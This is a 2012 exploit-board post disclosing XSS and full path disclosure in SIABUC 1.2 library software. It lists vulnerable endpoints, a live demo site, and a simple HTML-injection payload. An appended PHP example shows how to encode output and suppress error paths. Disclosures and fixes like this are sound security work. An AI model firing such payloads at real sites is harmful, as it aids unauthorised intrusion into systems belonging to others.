Underc0de

[In]Security => Bugs and Exploits => Thread started by: MaztoR on July 07, 2012, 03:41:09 AM

Title: Xss & Full path Disclosure WebApp Library SIABUC
Posted by: MaztoR on July 07, 2012, 03:41:09 AM
# Author: Mazt0r
# Exploit Title: XSS & Full Path Disclosure SIABUC
# Date: 24/02/2012
# software: SIABUC
# link: http://siabuc.ucol.mx/
# Version: Version 1.2 [Other versions "NOT TESTED"]
# Category: webapps Library
# Tested on: Linux

Demo:http://www.cidcacs.iis.ucr.ac.cr/

----------------
Vulnerable
----------------
/reservacion/index.php
/reservacion/include/buscar.php

Exploit:
======================

http://localhost/reservacion/index.php

POST: XSS
Result: /reservacion/include/buscar.php
======================
Example:
======================

|---------------------|
|" > < h1 > A < / h1 >|
|---------------------|
\
- Execution Code

Result FPD: Notice: Trying to get property of non-object in C:\ABCSIS\Reservacion\include\buscarws.php on line ***


"© Derechos reservados 2010, Universidad de Colima. Página desarrollada por el departamento de SIABUC"

----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------
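
A defensive counterpart to the two findings above, as an added example that is not part of the original post and is not SIABUC's code: the reflected value is HTML-encoded for a quoted-attribute context, the lookup result is checked before any property access, and PHP notices go to the log instead of the response. The POST field name `termino`, the function `lookup_catalog()` and the property `titulo` are hypothetical.

```php
<?php
// Added example: hypothetical hardened search handler; not SIABUC's code.
// Assumed names: the POST field "termino", lookup_catalog(), and the ->titulo property.

// Full path disclosure: keep notices/warnings out of the response and log them instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
error_reporting(E_ALL);

/** Encode a value for HTML text and quoted-attribute contexts. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Stand-in for the backend/web-service lookup; returns null when nothing matches. */
function lookup_catalog(string $term): ?object
{
    $catalog = ['redes' => (object) ['titulo' => 'Redes de computadoras']]; // constructed data
    return $catalog[strtolower($term)] ?? null;
}

/** Build the search form and result fragment for a submitted term. */
function render_search(array $post): string
{
    $raw  = $post['termino'] ?? '';
    $term = is_string($raw) ? trim($raw) : '';   // reject array-valued parameters

    // The term is reflected into a quoted attribute, the context the posted string breaks out of.
    $html = '<form method="post"><input name="termino" value="' . h($term) . '"></form>';

    $record = $term === '' ? null : lookup_catalog($term);
    if (!is_object($record)) {
        // No property access on a non-object, so no notice and no path in the output.
        return $html . '<p>No results for ' . h($term) . '</p>';
    }
    return $html . '<p>' . h($record->titulo) . '</p>';
}

// Constructed input: the string from the post, as the browser would send it.
echo render_search(['termino' => '"><h1>A</h1>']), PHP_EOL;
```

Setting `display_errors` in `php.ini` or the virtual host configuration rather than per script covers files that fail before `ini_set()` runs.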